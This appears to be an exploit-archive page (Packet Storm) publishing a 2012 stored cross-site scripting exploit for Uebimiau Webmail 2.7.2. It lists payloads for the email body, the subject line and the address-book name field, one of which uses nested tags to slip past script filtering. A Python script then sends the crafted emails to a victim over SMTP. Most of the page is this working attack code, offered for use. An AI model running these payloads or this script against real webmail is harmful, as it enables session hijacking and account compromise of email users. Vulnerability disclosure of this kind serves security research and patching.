what you don't know can hurt you

Uebimiau Webmail 2.7.2 Cross Site Scripting

Uebimiau Webmail 2.7.2 Cross Site Scripting
Posted Aug 18, 2012
Authored by Shai rod

Uebimiau Webmail version 2.7.2 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 2c434409adcbc630ee48e54434f8b2e8b729fe6e1cc6a3a840e0de3754b97a07

Uebimiau Webmail 2.7.2 Cross Site Scripting

Change Mirror Download
#!/usr/bin/python

'''
# Exploit Title: Uebimiau Webmail Stored XSS
# Date: 17/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://www.uebimiau.org/
# Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
# Version: 2.7.2

#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar


About the Application:
======================

Uebimiau is an universal webmail developed in PHP by Aldoir Ventura.
It is free and can be installed in any email server.

-It runs under any System;
-It doesn't require any extra PHP modules;
-Doesn't need a database (as MySQL, PostreSQL,etc)
-Doesn't need IMAP, but compatible with POP3 and IMAP
-Compatible with the MIME Standard (send/receive text/html emails);
-Doesn't need cookies;
-Easy installation. You only modify one file;
-Compatible with Apache, PHP, Sendmail or QMAIL;
-Can be easily translated into any language (already translated in 17 languages);
-Can use a variety of skins




Vulnerability Description
=========================


1. Stored XSS in e-mail body.

XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>

Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.


2. Stored XSS in "Title" field ( works when victim opens message in full view).

XSS Payload: SubjectGoesHere"><img src='1.jpg'onerror=javascript:alert("XSS")>

This one requires you to send at least 2 messages to the victim with the payload in the email subject.

Location of injection in page source:

<a class="menu" href="readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5"
title="Uebimiau Webmail Stored XSS POC "><img src='1.jpg'onerror=javascript:alert("XSS")>">Next</a> ::
<a class="menu" href="javascript:goback()">Back</a> ::

3. Stored XSS in Address Book

XSS Payload: <script>alert("XSS")</script>

Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.

'''

import smtplib

print "###############################################"
print "# Uebimiau Webmail Stored XSS POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "10.0.0.5"
smtp_port = 25
subject = "Uebimiau Webmail Stored XSS POC"
xss_payload_1 = """ "><img src='1.jpg'onerror=javascript:alert("XSS")>"""
xss_payload_2 = """<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
% (sender, ", ".join(recipient), subject + xss_payload_1) )
msg += "Content-type: text/html\n\n"
msg += """Nothing to see here...\r\n"""
msg += xss_payload_2
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
print "[*] Sending Message 1\r"
server.sendmail(sender, recipient, msg)
print "[*] Sending Message 2\r"
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"


Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close